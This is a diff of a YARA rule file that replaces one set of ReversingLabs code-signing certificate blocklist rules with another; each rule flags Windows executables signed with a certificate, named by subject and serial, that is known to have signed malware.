+		logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25565,21 +47959,21 @@ rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d"
+		id = "8415406b-ede8-5404-8208-34eb649f7325"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13892-L13910"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7940-L7958"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba"
+		logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25589,21 +47983,21 @@ rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "smnetworks" and ( pe.signatures [ i ] . serial == "00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures [ i ] . serial == "f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" ) and 1277769600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and ( pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures [ i ] . serial == "ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" ) and 1608640280 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a363a84-c21c-5afe-9812-9ce16962b28a"
+		id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13912-L13928"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7960-L7976"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a"
+		logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25613,21 +48007,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b"
+		id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13930-L13946"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7978-L7996"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22"
+		logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25637,21 +48031,21 @@ rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Conpavi AG" and pe.signatures [ i ] . serial == "24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and ( pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures [ i ] . serial == "a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" ) and 1606867200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2863a050-ebce-5322-b64a-9160adf6cc21"
+		id = "32cefe84-b305-5542-a5d3-1832dcbf6d61"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13948-L13964"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7998-L8014"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb"
+		logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25661,21 +48055,21 @@ rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a"
+		id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13966-L13984"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8016-L8034"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f"
+		logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25685,21 +48079,21 @@ rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures [ i ] . serial == "83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" ) and 1524614400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and ( pe.signatures [ i ] . serial == "00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" ) and 1606089600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a07d1c35-0026-526a-bf08-e6b07008da03"
+		id = "453b5da2-ae26-5005-8a56-1105a960fde6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13986-L14002"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8036-L8052"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b"
+		logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25709,21 +48103,21 @@ rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "849c390e-f81f-558e-88a3-19242c127a56"
+		id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14004-L14020"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8054-L8070"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c"
+		logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25733,21 +48127,21 @@ rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "721e48fb-3046-5b2d-8ad9-ae340e598794"
+		id = "93ca450e-7278-5c6c-aba8-e90728570e0c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14022-L14038"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8072-L8090"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8"
+		logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25757,21 +48151,21 @@ rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Direct Systems Ltd" and pe.signatures [ i ] . serial == "36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and ( pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures [ i ] . serial == "d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" ) and 1607558400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f014b446-0ddc-51df-898c-200bd60181a0"
+		id = "70fc063e-f032-5e63-ae53-65a25d5a29c3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14040-L14056"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8092-L8108"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af"
+		logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25781,21 +48175,21 @@ rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecnopolis Consulting Ltd" and pe.signatures [ i ] . serial == "73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1"
+		id = "4aedeb77-181b-5422-bec4-93c84412bae4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14058-L14074"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8110-L8128"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138"
+		logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25805,21 +48199,21 @@ rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and ( pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures [ i ] . serial == "d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" ) and 1606953600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56f62454-84a1-5843-b2f4-fa84b37040f3"
+		id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14076-L14092"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8130-L8148"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4"
+		logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25829,21 +48223,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) and 1612915200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dae6b474-e4f0-5c73-b32e-d2680f508799"
+		id = "79989b9b-60e4-577d-97e2-cb447c38baf3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14094-L14110"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8150-L8166"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c"
+		logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25853,21 +48247,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funbit" and pe.signatures [ i ] . serial == "7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e"
+		id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14112-L14128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8168-L8184"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436"
+		logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -25877,21 +48271,21 @@ rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELECTRONIC GROUP" and pe.signatures [ i ] . serial == "09:8a:57" and 1032855179 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3"
+		id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
